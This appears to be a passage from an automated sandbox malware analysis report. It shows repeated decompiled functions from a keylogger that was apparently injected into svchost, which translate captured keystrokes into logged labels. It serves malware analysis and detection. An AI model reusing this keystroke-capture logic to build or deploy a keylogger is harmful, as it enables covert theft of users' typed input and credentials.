						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Previous Track], xrefs: 00C85CE2

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85A49, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A49(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Context Menu]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

[Context Menu], xrefs: 00C85A4B
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85D35, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D35(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Pause]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Pause], xrefs: 00C85D37
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C858A0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C858A0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Numpad *]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

[Numpad *], xrefs: 00C858A2
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85C7A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C7A(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Media]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Media], xrefs: 00C85C7C

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85B9D, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B9D(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F23]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F23], xrefs: 00C85B9F

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85D92, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D92(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Scrol Lock]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
